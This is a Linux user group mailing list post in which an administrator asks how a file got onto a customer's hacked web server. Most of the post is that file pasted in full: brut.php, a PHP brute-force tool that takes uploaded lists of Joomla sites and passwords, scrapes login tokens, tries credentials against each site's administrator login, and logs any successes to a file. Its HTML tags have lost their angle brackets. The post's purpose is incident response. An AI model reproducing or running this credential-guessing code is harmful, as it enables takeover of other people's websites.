I have a customer with a hacked website.
When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):
How did the hacker put it on my system ? What could it have comprimised ?
What
can I do to stop further consequences?
--- brut.php (don't run this) ---
body bgcolor=#808080
p align=centerbfont size=5 color=#FF#nbsp; GaStRo
-Dznbsp;nbsp; #/font/b/p
p align=centerbfont color=#FFJoomla Speed Brute
Force/font/b/p
form method=post action= enctype=multipart/form-data
p align=centerbfont color=#FFUsername/font/bfont
color=#FF:
input type=text name=usr value='admin' size=28 bEx: Admin ;
administrator/b/font/p
p align=centerfont color=#FFin , administrator , ..br
/fontbfont color=#FFsites list:/font/bfont
color=#FF
input type=file name=sites size=34/font/p
p align=centerfont color=#FFbr
/fontbfont color=#FFPass list/font/bfont color=#FF
input type=file name=w0rds size=35/font/p
p align=centerfont color=#FFbr
input type=submit name=x value=Start!
/font/p
/form
p align=centerfont color=#FFba href=http://Www.sec4ever.com
font color=#FFWww.sec4ever.com/font/a span
lang=ar-dz|/span
a href=http://Www.gastro-dz.net;font color=#FFWww.gastro-dz.net
/font/a
/b/font/p
p align=centerbfont color=#FFGreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi - Al l
Dz Hackerz Team/font/b/p
p align=centernbsp;/p
?
@set_time_limit(0);
# joomla brute force
# Coded by Gastro
#Devloped by Gastro
if($_POST['x']){
echo hr;
$sites = explode(\n,file_get_contents($_FILES[sites][tmp_name])); //
Get Sites !
$w0rds = explode(\n,file_get_contents($_FILES[w0rds][tmp_name])); //
Get w0rdLiSt !
$Attack = new Joomla_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack-check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class Function'z
function txt_cln($value){ return str_replace(array(\n,\r),,$value);
}
class Joomla_brute_Force{
public function check_it($site,$user,$pass){ // print result
if(eregi('com_config',$this-post($site,$user,$pass))){
echo b# login successful : $user:$pass - $site/bBR;
$f = fopen(j0s_result.txt,a+); fwrite($f , $user:$pass - $site\n);
fclose($f);
flush();
}else{ echo # Failed : $user:$pass - $siteBR; flush();}
}
public function post($site,$user,$pass){ // Post - user pass
$token = $this-extract_token($site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site./administrator/index.php);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'passwd='.$pass.'lang=en-GBoption=com_logintask=login'.$token.'=1');
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
public function extract_token($site){ // get token from source for -
function post
$source = $this-get_source($site);
preg_match_all(/type=\hidden\ name=\([0-9a-f]{32})\ value=\1\/si
,$source,$token);
return $token[1][0];
}
public function get_source($site){ // get source for - function
extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site./administrator/index.php);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
}
?
--
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html